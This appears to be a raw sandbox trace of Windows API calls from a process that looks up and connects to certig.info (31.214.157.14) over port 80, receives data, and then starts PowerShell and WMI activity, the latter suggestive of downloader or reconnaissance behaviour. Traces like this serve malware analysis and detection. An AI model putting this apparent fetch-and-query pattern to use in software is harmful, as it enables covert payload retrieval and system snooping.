	[0236.853] GetLastError () returned 0x0
	[0236.853] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2c9b310, cbSid=0x5dee4b8 | out: pSid=0x2c9b310*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x5dee4b8) returned 1
	[0236.853] GetLastError () returned 0x0
	[0236.853] CreateMutexW (lpMutexAttributes=0x2c9b420, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3ec
	[0236.853] GetLastError () returned 0x0
	[0236.853] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1f4) returned 0x0
	[0236.853] GetLastError () returned 0x0
	[0236.854] ReleaseMutex (hMutex=0x3ec) returned 1
	[0236.854] GetLastError () returned 0x0
	[0236.854] CloseHandle (hObject=0x3ec) returned 1
	[0236.854] GetLastError () returned 0x0
	[0236.854] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2c9bba8, cbSid=0x5dee4b8 | out: pSid=0x2c9bba8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x5dee4b8) returned 1
	[0236.854] GetLastError () returned 0x0
	[0236.855] CreateMutexW (lpMutexAttributes=0x2c9bcb8, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3ec
	[0236.855] GetLastError () returned 0x0
	[0236.855] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1f4) returned 0x0
	[0236.855] GetLastError () returned 0x0
	[0236.855] ReleaseMutex (hMutex=0x3ec) returned 1
	[0236.856] GetLastError () returned 0x0
	[0236.856] CloseHandle (hObject=0x3ec) returned 1
	[0236.856] GetLastError () returned 0x0
	[0236.856] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2c9c438, cbSid=0x5dee4b8 | out: pSid=0x2c9c438*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x5dee4b8) returned 1
	[0236.856] GetLastError () returned 0x0
	[0236.857] CreateMutexW (lpMutexAttributes=0x2c9c548, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3ec
	[0236.857] GetLastError () returned 0x0
	[0236.857] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1f4) returned 0x0
	[0236.857] GetLastError () returned 0x0
	[0236.857] ReleaseMutex (hMutex=0x3ec) returned 1
	[0236.858] GetLastError () returned 0x0
	[0236.858] CloseHandle (hObject=0x3ec) returned 1
	[0236.858] GetLastError () returned 0x0
	[0236.858] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2c9ccc4, cbSid=0x5dee4b0 | out: pSid=0x2c9ccc4*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x5dee4b0) returned 1
	[0236.858] GetLastError () returned 0x0
	[0236.859] CreateMutexW (lpMutexAttributes=0x2c9cdd4, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3ec
	[0236.859] GetLastError () returned 0x0
	[0236.859] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1f4) returned 0x0
	[0236.859] GetLastError () returned 0x0
	[0236.859] ReleaseMutex (hMutex=0x3ec) returned 1
	[0236.859] GetLastError () returned 0x0
	[0236.859] CloseHandle (hObject=0x3ec) returned 1
	[0236.859] GetLastError () returned 0x0
	[0236.859] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2c9d540, cbSid=0x5dee4b0 | out: pSid=0x2c9d540*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x5dee4b0) returned 1
	[0236.859] GetLastError () returned 0x0
	[0236.860] CreateMutexW (lpMutexAttributes=0x2c9d650, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3ec
	[0236.860] GetLastError () returned 0x0
	[0236.860] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1f4) returned 0x0
	[0236.860] GetLastError () returned 0x0
	[0236.860] ReleaseMutex (hMutex=0x3ec) returned 1
	[0236.860] GetLastError () returned 0x0
	[0236.861] CloseHandle (hObject=0x3ec) returned 1
	[0236.861] GetLastError () returned 0x0
	[0236.861] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2c9ddb4, cbSid=0x5dee4b0 | out: pSid=0x2c9ddb4*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x5dee4b0) returned 1
	[0236.861] GetLastError () returned 0x0
	[0236.861] CreateMutexW (lpMutexAttributes=0x2c9dec4, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3ec
	[0236.861] GetLastError () returned 0x0
	[0236.862] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1f4) returned 0x0
	[0236.862] GetLastError () returned 0x0
	[0236.862] ReleaseMutex (hMutex=0x3ec) returned 1
	[0236.862] GetLastError () returned 0x0
	[0236.862] CloseHandle (hObject=0x3ec) returned 1
	[0236.862] GetLastError () returned 0x0
	[0236.862] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2c9e638, cbSid=0x5dee4b0 | out: pSid=0x2c9e638*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x5dee4b0) returned 1
	[0236.862] GetLastError () returned 0x0
	[0236.863] CreateMutexW (lpMutexAttributes=0x2c9e748, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3ec
	[0236.863] GetLastError () returned 0x0
	[0236.863] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1f4) returned 0x0
	[0236.863] GetLastError () returned 0x0
	[0236.863] ReleaseMutex (hMutex=0x3ec) returned 1
	[0236.863] GetLastError () returned 0x0
	[0236.863] CloseHandle (hObject=0x3ec) returned 1
	[0236.863] GetLastError () returned 0x0
	[0236.864] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2c9eeb4, cbSid=0x5dee4b0 | out: pSid=0x2c9eeb4*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x5dee4b0) returned 1
	[0236.864] GetLastError () returned 0x0
	[0236.864] CreateMutexW (lpMutexAttributes=0x2c9efc4, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3ec
	[0236.864] GetLastError () returned 0x0
	[0236.864] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1f4) returned 0x0
	[0236.864] GetLastError () returned 0x0
	[0236.865] ReleaseMutex (hMutex=0x3ec) returned 1
	[0236.865] GetLastError () returned 0x0
	[0236.865] CloseHandle (hObject=0x3ec) returned 1
	[0236.865] GetLastError () returned 0x0
	[0236.870] getaddrinfo (in: pNodeName="certig.info", pServiceName=0x0, pHints=0x5dee6b0*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x5dee444 | out: ppResult=0x5dee444*=0x7d7670*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="certig.info", ai_addr=0x7d9b60*(sa_family=2, sin_port=0x0, sin_addr="31.214.157.14"), ai_next=0x0)) returned 0
	[0236.990] GetLastError () returned 0x0
	[0236.991] FreeAddrInfoW (pAddrInfo=0x7d7670*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="散瑲杩椮普o࠰ؚᢣ⢓", ai_addr=0x7d9b60*(sa_family=2, sin_port=0x0, sin_addr="31.214.157.14"), ai_next=0x0)) 
	[0236.991] GetLastError () returned 0x0
	[0236.991] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x420
	[0236.992] GetLastError () returned 0x0
	[0236.993] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x428
	[0236.993] GetLastError () returned 0x0
	[0236.995] WSAConnect (in: s=0x420, name=0x2c9f50c*(sa_family=2, sin_port=0x50, sin_addr="31.214.157.14"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0237.020] GetLastError () returned 0x0
	[0237.021] closesocket (s=0x428) returned 0
	[0237.021] GetLastError () returned 0x0
	[0238.775] recv (in: s=0x420, buf=0x2f5db30, len=502, flags=0 | out: buf=0x2f5db30*) returned 205
	[0238.775] GetLastError () returned 0x0
	[0240.337] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x769e70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0240.337] GetLastError () returned 0xcb
	[0240.380] VirtualQuery (in: lpAddress=0x5dedb98, lpBuffer=0x5deeb98, dwLength=0x1c | out: lpBuffer=0x5deeb98*(BaseAddress=0x5ded000, AllocationBase=0x5460000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0240.436] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x769e70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0240.436] GetLastError () returned 0xcb
	[0240.588] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x769e70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0240.588] GetLastError () returned 0xcb
	[0240.788] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3e4
	[0240.788] GetLastError () returned 0x0
	[0240.790] CoGetObjectContext (in: riid=0x2fdab50*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5dee70c | out: ppv=0x5dee70c*=0x718dec) returned 0x0
	[0241.091] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\", nBufferLength=0x105, lpBuffer=0x5ded8c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\", lpFilePart=0x0) returned 0x2e
	[0241.091] GetLastError () returned 0x0
	[0241.094] LoadLibraryA (lpLibFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\\\wminet_utils.dll") returned 0x6a310000
	[0241.231] GetProcAddress (hModule=0x6a310000, lpProcName="ResetSecurity") returned 0x6a311944
	[0241.236] GetProcAddress (hModule=0x6a310000, lpProcName="SetSecurity") returned 0x6a311986
	[0241.239] GetProcAddress (hModule=0x6a310000, lpProcName="BlessIWbemServices") returned 0x6a3119cc
	[0241.243] GetProcAddress (hModule=0x6a310000, lpProcName="BlessIWbemServicesObject") returned 0x6a311a1e
	[0241.247] GetProcAddress (hModule=0x6a310000, lpProcName="GetPropertyHandle") returned 0x6a311a70
	[0241.250] GetProcAddress (hModule=0x6a310000, lpProcName="WritePropertyValue") returned 0x6a311a89
	[0241.253] GetProcAddress (hModule=0x6a310000, lpProcName="Clone") returned 0x6a311aa2
	[0241.338] GetProcAddress (hModule=0x6a310000, lpProcName="VerifyClientKey") returned 0x6a312270
	[0241.339] GetProcAddress (hModule=0x6a310000, lpProcName="GetQualifierSet") returned 0x6a311d73
	[0241.341] GetProcAddress (hModule=0x6a310000, lpProcName="Get") returned 0x6a311b96
	[0241.343] GetProcAddress (hModule=0x6a310000, lpProcName="Put") returned 0x6a311b7a
	[0241.344] GetProcAddress (hModule=0x6a310000, lpProcName="Delete") returned 0x6a311bb5
	[0241.346] GetProcAddress (hModule=0x6a310000, lpProcName="GetNames") returned 0x6a311bc8
	[0241.348] GetProcAddress (hModule=0x6a310000, lpProcName="BeginEnumeration") returned 0x6a311be4
	[0241.351] GetProcAddress (hModule=0x6a310000, lpProcName="Next") returned 0x6a311bf7
	[0241.355] GetProcAddress (hModule=0x6a310000, lpProcName="EndEnumeration") returned 0x6a311c16
	[0241.397] IComThreadingInfo:GetCurrentApartmentType (in: This=0x718dec, pAptType=0x5dee704 | out: pAptType=0x5dee704*=1) returned 0x0
	[0241.405] IUnknown:QueryInterface (in: This=0x718dec, riid=0x2fdab38*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x5dee708 | out: ppvObject=0x5dee708*=0x0) returned 0x80004002
	[0241.406] IUnknown:Release (This=0x718dec) returned 0x0
	[0241.492] IIDFromString (in: lpsz="{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}", lpiid=0x5dee2bc | out: lpiid=0x5dee2bc) returned 0x0
	[0241.493] CoGetClassObject (in: rclsid=0x7d79e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x746da3b0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5dee224 | out: ppv=0x5dee224*=0x6350810) returned 0x0
	[0242.120] WbemDefPath:IUnknown:QueryInterface (in: This=0x6350810, riid=0x747c7ecc*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5dee054 | out: ppvObject=0x5dee054*=0x0) returned 0x80004002
	[0242.120] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6350810, pUnkOuter=0x0, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dee08c | out: ppvObject=0x5dee08c*=0x6350820) returned 0x0
	[0242.120] WbemDefPath:IUnknown:QueryInterface (in: This=0x6350820, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dede30 | out: ppvObject=0x5dede30*=0x6350820) returned 0x0
	[0242.120] WbemDefPath:IUnknown:QueryInterface (in: This=0x6350820, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5deddec | out: ppvObject=0x5deddec*=0x0) returned 0x80004002
	[0242.121] WbemDefPath:IUnknown:AddRef (This=0x6350820) returned 0x3
	[0242.121] CoGetContextToken (in: pToken=0x5dedc78 | out: pToken=0x5dedc78) returned 0x0
	[0242.122] CoGetObjectContext (in: riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x7d5954 | out: ppv=0x7d5954*=0x718de0) returned 0x0
	[0242.122] WbemDefPath:IUnknown:QueryInterface (in: This=0x6350820, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dedc60 | out: ppvObject=0x5dedc60*=0x7ed2e0) returned 0x0
	[0242.122] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x7ed2e0, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5dedc68 | out: pCid=0x5dedc68*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0242.122] WbemDefPath:IUnknown:Release (This=0x7ed2e0) returned 0x3
	[0242.122] CoGetContextToken (in: pToken=0x5dedc70 | out: pToken=0x5dedc70) returned 0x0
	[0242.122] WbemDefPath:IUnknown:AddRef (This=0x6350820) returned 0x4
	[0242.122] WbemDefPath:IUnknown:QueryInterface (in: This=0x6350820, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dedce4 | out: ppvObject=0x5dedce4*=0x0) returned 0x80004002
	[0242.123] WbemDefPath:IUnknown:Release (This=0x6350820) returned 0x3
	[0242.123] WbemDefPath:IUnknown:Release (This=0x6350820) returned 0x2
	[0242.123] WbemDefPath:IUnknown:Release (This=0x6350810) returned 0x0
	[0242.123] WbemDefPath:IUnknown:Release (This=0x6350820) returned 0x1
	[0242.124] CoGetContextToken (in: pToken=0x5dee520 | out: pToken=0x5dee520) returned 0x0
	[0242.124] CoGetContextToken (in: pToken=0x5dee4e0 | out: pToken=0x5dee4e0) returned 0x0
	[0242.124] WbemDefPath:IUnknown:AddRef (This=0x6350820) returned 0x2
	[0242.124] WbemDefPath:IUnknown:QueryInterface (in: This=0x6350820, riid=0x5dee55c*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x5dee558 | out: ppvObject=0x5dee558*=0x6350820) returned 0x0
	[0242.124] WbemDefPath:IUnknown:Release (This=0x6350820) returned 0x2
	[0242.124] WbemDefPath:IUnknown:Release (This=0x6350820) returned 0x1
	[0242.125] CoGetObjectContext (in: riid=0x2fdab50*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5dedf30 | out: ppv=0x5dedf30*=0x718dec) returned 0x0
	[0242.125] IComThreadingInfo:GetCurrentApartmentType (in: This=0x718dec, pAptType=0x5dedf28 | out: pAptType=0x5dedf28*=1) returned 0x0
	[0242.126] IUnknown:QueryInterface (in: This=0x718dec, riid=0x2fdab38*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x5dedf2c | out: ppvObject=0x5dedf2c*=0x0) returned 0x80004002
	[0242.126] IUnknown:Release (This=0x718dec) returned 0x1
	[0242.128] CoGetClassObject (in: rclsid=0x7d79e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x746da3b0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5deda48 | out: ppv=0x5deda48*=0x6350810) returned 0x0
	[0242.128] WbemDefPath:IUnknown:QueryInterface (in: This=0x6350810, riid=0x747c7ecc*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5ded878 | out: ppvObject=0x5ded878*=0x0) returned 0x80004002
	[0242.128] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6350810, pUnkOuter=0x0, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5ded8b0 | out: ppvObject=0x5ded8b0*=0x63508b8) returned 0x0
	[0242.128] WbemDefPath:IUnknown:QueryInterface (in: This=0x63508b8, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5ded654 | out: ppvObject=0x5ded654*=0x63508b8) returned 0x0
	[0242.129] WbemDefPath:IUnknown:QueryInterface (in: This=0x63508b8, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5ded610 | out: ppvObject=0x5ded610*=0x0) returned 0x80004002
	[0242.129] WbemDefPath:IUnknown:AddRef (This=0x63508b8) returned 0x3
	[0242.129] CoGetContextToken (in: pToken=0x5ded49c | out: pToken=0x5ded49c) returned 0x0
	[0242.129] WbemDefPath:IUnknown:QueryInterface (in: This=0x63508b8, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5ded484 | out: ppvObject=0x5ded484*=0x7ed2f0) returned 0x0
	[0242.129] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x7ed2f0, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5ded48c | out: pCid=0x5ded48c*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0242.129] WbemDefPath:IUnknown:Release (This=0x7ed2f0) returned 0x3
	[0242.130] CoGetContextToken (in: pToken=0x5ded494 | out: pToken=0x5ded494) returned 0x0
	[0242.130] WbemDefPath:IUnknown:AddRef (This=0x63508b8) returned 0x4
	[0242.130] WbemDefPath:IUnknown:QueryInterface (in: This=0x63508b8, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5ded508 | out: ppvObject=0x5ded508*=0x0) returned 0x80004002
	[0242.130] WbemDefPath:IUnknown:Release (This=0x63508b8) returned 0x3
	[0242.130] WbemDefPath:IUnknown:Release (This=0x63508b8) returned 0x2
	[0242.130] WbemDefPath:IUnknown:Release (This=0x6350810) returned 0x0
	[0242.130] WbemDefPath:IUnknown:Release (This=0x63508b8) returned 0x1
	[0242.131] CoGetContextToken (in: pToken=0x5dedd44 | out: pToken=0x5dedd44) returned 0x0
	[0242.131] CoGetContextToken (in: pToken=0x5dedd04 | out: pToken=0x5dedd04) returned 0x0
	[0242.131] WbemDefPath:IUnknown:AddRef (This=0x63508b8) returned 0x2
	[0242.131] WbemDefPath:IUnknown:QueryInterface (in: This=0x63508b8, riid=0x5dedd80*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x5dedd7c | out: ppvObject=0x5dedd7c*=0x63508b8) returned 0x0
	[0242.131] WbemDefPath:IUnknown:Release (This=0x63508b8) returned 0x2
	[0242.131] WbemDefPath:IUnknown:Release (This=0x63508b8) returned 0x1
	[0242.141] CoGetContextToken (in: pToken=0x5deddc4 | out: pToken=0x5deddc4) returned 0x0
	[0242.141] CoGetContextToken (in: pToken=0x5dedd84 | out: pToken=0x5dedd84) returned 0x0
	[0242.141] WbemDefPath:IUnknown:AddRef (This=0x63508b8) returned 0x2
	[0242.141] WbemDefPath:IUnknown:QueryInterface (in: This=0x63508b8, riid=0x5dede00*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x5deddfc | out: ppvObject=0x5deddfc*=0x63508b8) returned 0x0
	[0242.141] WbemDefPath:IUnknown:Release (This=0x63508b8) returned 0x2
	[0242.141] WbemDefPath:IUnknown:AddRef (This=0x63508b8) returned 0x3
	[0242.141] WbemDefPath:IWbemPath:SetText (This=0x63508b8, uMode=0x4, pszPath="//./root/cimv2") returned 0x0
	[0242.142] WbemDefPath:IUnknown:Release (This=0x63508b8) returned 0x2
	[0242.142] CoGetContextToken (in: pToken=0x5dee5a0 | out: pToken=0x5dee5a0) returned 0x0
	[0242.142] CoGetContextToken (in: pToken=0x5dee560 | out: pToken=0x5dee560) returned 0x0
	[0242.142] WbemDefPath:IUnknown:AddRef (This=0x6350820) returned 0x2
	[0242.142] WbemDefPath:IUnknown:QueryInterface (in: This=0x6350820, riid=0x5dee5dc*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x5dee5d8 | out: ppvObject=0x5dee5d8*=0x6350820) returned 0x0
	[0242.142] WbemDefPath:IUnknown:Release (This=0x6350820) returned 0x2
	[0242.142] WbemDefPath:IUnknown:AddRef (This=0x6350820) returned 0x3
	[0242.142] WbemDefPath:IWbemPath:SetText (This=0x6350820, uMode=0x4, pszPath="\\\\localhost\\root\\cimv2") returned 0x0
	[0242.143] WbemDefPath:IUnknown:Release (This=0x6350820) returned 0x2
	[0242.185] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6350820, puCount=0x5dee744 | out: puCount=0x5dee744*=0x2) returned 0x0
	[0242.192] WbemDefPath:IWbemPath:GetText (in: This=0x6350820, lFlags=4, puBuffLength=0x5dee740*=0x0, pszText=0x0 | out: puBuffLength=0x5dee740*=0x17, pszText=0x0) returned 0x0
	[0242.193] WbemDefPath:IWbemPath:GetText (in: This=0x6350820, lFlags=4, puBuffLength=0x5dee740*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5dee740*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0242.195] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6350820, puCount=0x5dee740 | out: puCount=0x5dee740*=0x2) returned 0x0
	[0242.195] WbemDefPath:IWbemPath:GetText (in: This=0x6350820, lFlags=4, puBuffLength=0x5dee73c*=0x0, pszText=0x0 | out: puBuffLength=0x5dee73c*=0x17, pszText=0x0) returned 0x0
	[0242.196] WbemDefPath:IWbemPath:GetText (in: This=0x6350820, lFlags=4, puBuffLength=0x5dee73c*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5dee73c*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0242.196] CoGetObjectContext (in: riid=0x2fdab50*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5dee6bc | out: ppv=0x5dee6bc*=0x718dec) returned 0x0
	[0242.196] IComThreadingInfo:GetCurrentApartmentType (in: This=0x718dec, pAptType=0x5dee6b4 | out: pAptType=0x5dee6b4*=1) returned 0x0
	[0242.196] IUnknown:QueryInterface (in: This=0x718dec, riid=0x2fdab38*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x5dee6b8 | out: ppvObject=0x5dee6b8*=0x0) returned 0x80004002
	[0242.196] IUnknown:Release (This=0x718dec) returned 0x1
